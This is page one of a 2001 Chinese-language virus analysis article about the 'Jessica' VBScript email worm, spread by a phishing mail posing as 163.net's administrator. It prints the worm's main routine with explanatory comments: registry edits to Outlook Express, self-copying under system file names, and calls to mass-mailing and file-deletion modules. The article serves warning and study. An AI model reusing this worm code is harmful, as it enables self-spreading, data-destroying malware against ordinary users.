您现在的位置是: E企业 > 安全之路 > 病毒解剖 > 正文


T O P 排 行


警惕新病毒——Jessica Worm
2001-07-31· ·周侃··yesky

1 2 3 4 5  下一页

  近日收信时偶然发现了一个不寻常的邮件,竟然是163网管(root@163.net)给我寄来的。内容是告诉我,163的免费电子邮箱要收费了,要我马上申请注册。我纳闷啊,我根本没有163的邮箱,怎么寄给我信?再仔细看看,信里带一个名称为Table.htm.vbs的附件,呵呵,看来八成又是一个病毒吧,在我面前竟敢“班门弄斧”(呵呵,笑谈!),赶快另存为文本文件,研究研究……

  果然又是一个Visual Baisc Script编写的邮件病毒,而且手段毒辣,大有将我的硬盘彻底洗荡的企图。分析完后,我不由得感到一阵后怕——要是碰巧我有163的邮箱,那不是…… 赶快曝曝光,以免更多的人受害。

'************************** Jessica Worm **************************
On Error Resume Next '容错语句,避免程序崩溃
dim filesys,sysdir,windir,file,vbscp
Set filesys = CreateObject("Scripting.FileSystemObject") '建立文件系统对象,必不可少
set file = filesys.OpenTextFile(WScript.ScriptFullname,1) '以文本方式打开病毒自己
vbscp=file.ReadAll '读入自己的内容
main() '进入主过程


sub main() '主过程
On Error Resume Next
dim timeover,err,sm,imme,addadd,address,c
set timeover=CreateObject("WScript.Shell")
err=timeover.RegRead("HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout") '读入注册表中的超时键值
if (err>=1) then '超时设置
timeover.RegWrite "HKEY_CURRENT_USER\Software\Microsoft\Windows Scripting Host\Settings\Timeout",0,"REG_DWORD"
end if
set sm=CreateObject("WScript.Shell")
imme=sm.RegRead("HKEY_USERS\.DEFAULT\Identities\{C5D5F200-C07E-11D1-90A0-A3F032AC2F46}\Software\Microsoft\Outlook Express\5.0\Mail\Send Mail Immediately")
if (imme>=0) then '修改OE的注册表键值,避免用户改为“不立即发送邮件”
sm.RegWrite "HKEY_USERS\.DEFAULT\Identities\{C5D5F200-C07E-11D1-90A0-A3F032AC2F46}\Software\Microsoft\Outlook Express\5.0\Mail
\Send Mail Immediately",1,"REG_DWORD"
end if
set addadd=CreateObject("WScript.Shell")
address=addadd.RegRead("HKEY_USERS\.DEFAULT\Identities\{C5D5F200-C07E-11D1-90A0-A3F032AC2F46}\Software\Microsoft\Outlook Express\5.0\Mail\Auto Add Replies To WAB")
if (address>=0) then '修改OE的注册表键值,避免用户改为“不自动添加通讯簿”
addadd.RegWrite "HKEY_USERS\.DEFAULT\Identities\{C5D5F200-C07E-11D1-90A0-A3F032AC2F46}\Software\Microsoft\Outlook Express\5.0\Mail
\Auto Add Replies To WAB",1,"REG_DWORD"
end if
Set windir = filesys.GetSpecialFolder(0) '得到Windows目录
Set sysdir = filesys.GetSpecialFolder(1) '得到System目录
Set c = filesys.GetFile(WScript.ScriptFullName) '得到病毒的路径
c.Copy(sysdir&"\Kernel32.vbs") '将自己复制到System下
c.Copy(windir&"\Rundll32.vbs") '将自己复制到Windows下
c.Copy(sysdir&"\Table.htm.vbs") '向System下再复制一个
regload() '调用写注册表的模块
mailworm() '调用发带毒邮件的模块
killc() '调用改写自动批处理的模块
alldrivers() '调用删文件的模块
end sub

1 2 3 4 5  下一页

■ 相关内容
 病毒的分类及各自的特征
 趋势科技IGA防毒墙
 电脑病毒已造成百亿损失
 将病毒斩草除根
 “红色代号”病毒
 “欢乐时光”既“酷”又“辣”
 网络蠕虫病毒肆虐国内
 “万花谷”网页病毒源码分析
 利用OutLook漏洞的蠕虫病毒
 魔鬼出现了---真正的邮件病毒“欢乐时光”
 木马病毒的通用解法
 电脑病毒与基因算法
 变形病毒的基本类型
感谢 访问天极网,如果您觉得该文章涉及版权问题,请看这里!